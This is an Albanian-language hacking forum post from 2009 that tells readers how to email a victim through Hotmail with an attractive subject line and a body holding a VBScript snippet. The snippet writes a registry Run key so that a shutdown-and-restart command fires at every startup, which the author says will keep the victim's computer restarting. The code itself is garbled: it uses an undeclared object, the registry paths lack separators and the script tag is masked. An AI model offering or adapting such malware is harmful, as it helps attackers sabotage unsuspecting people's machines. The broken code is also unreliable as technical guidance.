besimm berishaa
 
ForumCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 prish pc per mes letrave ne msn

Shko poshtë 
AutoriMesazh
b3s1mmX
Admin


Numri i postimeve : 24
Join date : 14/06/2009
Location : Fush Kosova

MesazhTitulli: prish pc per mes letrave ne msn   Sun Jun 14, 2009 9:09 pm

Code te cilat e shkymin kompjuterin edhe code te tjera

Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!

Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:

--------------------------------------------------------------------------

******** ****************="vbscript"> on error resume next dim ok

set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSYSTEM32","shutdown -r"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSYSTEM32","shutdown -r"

</SCRIPT>

--------------------------------------------------------------------------

Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pakme nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin!

per 24 sekonda do ti shymet.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://b3s1-hack1.albanianforum.net
 
prish pc per mes letrave ne msn
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
b3s1-hack1.darkbb.com :: Your first category :: Your first forum-
Kërce tek: